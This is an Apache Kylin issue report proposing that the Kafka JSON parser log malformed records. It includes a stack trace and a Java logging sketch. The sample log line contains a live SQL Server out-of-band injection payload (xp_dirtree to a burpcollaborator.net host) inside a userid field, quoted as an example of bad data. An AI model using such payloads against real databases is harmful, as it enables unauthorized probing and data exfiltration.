KYLIN-3767

Print the malformed JSON data consumed from Kafka Topic

Details

    • Type: Improvement
    • Status: Closed
    • Priority: Major
    • Resolution: Fixed
    • Affects Version/s: v2.2.0, v2.3.0, v2.4.0
    • Fix Version/s: None
    • Component/s: Job Engine
    • Labels: None

    Description

      Recently, the build of my cube with streaming data failed, so I checked the syslog of the failed MR job.

      However, the log contents did not help. They were as follows:

      2019-01-11 15:12:48,774 INFO [main] org.apache.kylin.source.kafka.hadoop.KafkaInputRecordReader: kylin-full-site-pvuv:kafka4:9092:2 fetching offset 1537268 
      2019-01-11 15:12:48,776 INFO [main] org.apache.kylin.source.kafka.hadoop.KafkaInputRecordReader: kylin-full-site-pvuv:kafka4:9092:2 fetching offset 1537768 
      2019-01-11 15:12:48,778 INFO [main] org.apache.kylin.source.kafka.hadoop.KafkaInputRecordReader: kylin-full-site-pvuv:kafka4:9092:2 fetching offset 1538268 
      2019-01-11 15:12:48,781 INFO [main] org.apache.kylin.source.kafka.hadoop.KafkaInputRecordReader: kylin-full-site-pvuv:kafka4:9092:2 fetching offset 1538768 
      2019-01-11 15:12:48,783 INFO [main] org.apache.kylin.source.kafka.hadoop.KafkaInputRecordReader: kylin-full-site-pvuv:kafka4:9092:2 fetching offset 1539268 
      2019-01-11 15:12:48,787 ERROR [main] org.apache.kylin.source.kafka.TimedJsonStreamParser: error
      org.apache.kylin.job.shaded.com.fasterxml.jackson.core.JsonParseException: Unrecognized character escape 'h' (code 104)
       at [Source: (org.apache.kylin.common.util.ByteBufferBackedInputStream); line: 1, column: 207]
       at org.apache.kylin.job.shaded.com.fasterxml.jackson.core.JsonParser._constructError(JsonParser.java:1804)
       at org.apache.kylin.job.shaded.com.fasterxml.jackson.core.base.ParserMinimalBase._reportError(ParserMinimalBase.java:663)
       at org.apache.kylin.job.shaded.com.fasterxml.jackson.core.base.ParserMinimalBase._handleUnrecognizedCharacterEscape(ParserMinimalBase.java:640)
       at org.apache.kylin.job.shaded.com.fasterxml.jackson.core.json.UTF8StreamJsonParser._decodeEscaped(UTF8StreamJsonParser.java:3243)
       at org.apache.kylin.job.shaded.com.fasterxml.jackson.core.json.UTF8StreamJsonParser._finishString2(UTF8StreamJsonParser.java:2452)
       at org.apache.kylin.job.shaded.com.fasterxml.jackson.core.json.UTF8StreamJsonParser._finishAndReturnString(UTF8StreamJsonParser.java:2407)
       at org.apache.kylin.job.shaded.com.fasterxml.jackson.core.json.UTF8StreamJsonParser.getText(UTF8StreamJsonParser.java:269)
       at org.apache.kylin.job.shaded.com.fasterxml.jackson.databind.deser.std.UntypedObjectDeserializer$Vanilla.deserialize(UntypedObjectDeserializer.java:672)
       at org.apache.kylin.job.shaded.com.fasterxml.jackson.databind.deser.std.MapDeserializer._readAndBindStringKeyMap(MapDeserializer.java:527)
       at org.apache.kylin.job.shaded.com.fasterxml.jackson.databind.deser.std.MapDeserializer.deserialize(MapDeserializer.java:364)
       at org.apache.kylin.job.shaded.com.fasterxml.jackson.databind.deser.std.MapDeserializer.deserialize(MapDeserializer.java:29)
       at org.apache.kylin.job.shaded.com.fasterxml.jackson.databind.ObjectMapper._readMapAndClose(ObjectMapper.java:4001)
       at org.apache.kylin.job.shaded.com.fasterxml.jackson.databind.ObjectMapper.readValue(ObjectMapper.java:3072)
       at org.apache.kylin.source.kafka.TimedJsonStreamParser.parse(TimedJsonStreamParser.java:112)
       at org.apache.kylin.source.kafka.hadoop.KafkaFlatTableMapper.doMap(KafkaFlatTableMapper.java:87)
       at org.apache.kylin.source.kafka.hadoop.KafkaFlatTableMapper.doMap(KafkaFlatTableMapper.java:48)
       at org.apache.kylin.engine.mr.KylinMapper.map(KylinMapper.java:77)
       at org.apache.hadoop.mapreduce.Mapper.run(Mapper.java:145)
       at org.apache.hadoop.mapred.MapTask.runNewMapper(MapTask.java:793)
       at org.apache.hadoop.mapred.MapTask.run(MapTask.java:341)
       at org.apache.hadoop.mapred.YarnChild$2.run(YarnChild.java:164)
       at java.security.AccessController.doPrivileged(Native Method)
       at javax.security.auth.Subject.doAs(Subject.java:422)
       at org.apache.hadoop.security.UserGroupInformation.doAs(UserGroupInformation.java:1917)
       at org.apache.hadoop.mapred.YarnChild.main(YarnChild.java:158)
      

      The malformed JSON data should probably also be printed in the syslog, which would help with troubleshooting.

      For example:

      ...
      2019-01-11 15:12:48,778 INFO [main] org.apache.kylin.source.kafka.hadoop.KafkaInputRecordReader: kylin-full-site-pvuv:kafka4:9092:2 fetching offset 1538268 
      2019-01-11 15:12:48,781 INFO [main] org.apache.kylin.source.kafka.hadoop.KafkaInputRecordReader: kylin-full-site-pvuv:kafka4:9092:2 fetching offset 1538768 
      2019-01-11 15:12:48,783 INFO [main] org.apache.kylin.source.kafka.hadoop.KafkaInputRecordReader: kylin-full-site-pvuv:kafka4:9092:2 fetching offset 1539268 
      2019-01-11 15:12:48,785 ERROR [main] org.apache.kylin.source.kafka.TimedJsonStreamParser: malformed data: {"site":"10010-2","channel":"3","atime":1547119709319,"userid":"909c1c003ee825fc57c9d1fb20f279091547119221751;declare @q varchar(99);set @q='\\9jtdffd7wspm21e6llv88xu6pxvrji960tyhn.burpcollab'+'orator.net\hsh'; exec master.dbo.xp_dirtree @q;-- "}
      2019-01-11 15:12:48,787 ERROR [main] org.apache.kylin.source.kafka.TimedJsonStreamParser: error
      org.apache.kylin.job.shaded.com.fasterxml.jackson.core.JsonParseException: Unrecognized character escape 'h' (code 104)
       at [Source: (org.apache.kylin.common.util.ByteBufferBackedInputStream); line: 1, column: 207]
      	at org.apache.kylin.job.shaded.com.fasterxml.jackson.core.JsonParser._constructError(JsonParser.java:1804)
      ...
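
The proposal above amounts to logging the raw message before the parse error is reported. A minimal sketch of that idea follows; it is not the attached patch. The class `MalformedPayloadLogging`, its methods, and the `parser` argument are hypothetical names used for illustration, and `java.util.logging` stands in for whatever logger Kylin actually uses. The sketch assumes the message arrives as a `ByteBuffer` (the stack trace shows a `ByteBufferBackedInputStream`) and that the parser signals failure with an unchecked exception.

```java
import java.nio.ByteBuffer;
import java.nio.charset.StandardCharsets;
import java.util.function.Function;
import java.util.logging.Logger;

/** Hypothetical helper for illustration; not part of Kylin. */
final class MalformedPayloadLogging {
    private static final Logger LOG =
            Logger.getLogger(MalformedPayloadLogging.class.getName());

    /** Decodes the remaining bytes as UTF-8 without moving the caller's position. */
    static String preview(ByteBuffer payload) {
        // duplicate() shares the bytes but has its own position and limit,
        // so decoding the copy leaves the original buffer untouched.
        return StandardCharsets.UTF_8.decode(payload.duplicate()).toString();
    }

    /** Runs the parser; on failure, logs the raw payload and rethrows. */
    static <T> T parseOrLog(ByteBuffer payload, Function<ByteBuffer, T> parser) {
        // Snapshot taken before parsing, because the parser may consume the buffer.
        ByteBuffer snapshot = payload.duplicate();
        try {
            return parser.apply(payload);
        } catch (RuntimeException e) {
            LOG.severe("malformed data: " + preview(snapshot));
            throw e;
        }
    }
}
```

Taking the snapshot before parsing matters: a parser that reads from the buffer advances its position, so decoding the buffer afterwards could print only the unread tail of the message.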
      

      Attachments

        1. KYLIN-3767.master.001.patch
          1 kB
          Temple Zhou

            People

              temple.zhou Temple Zhou
              temple.zhou Temple Zhou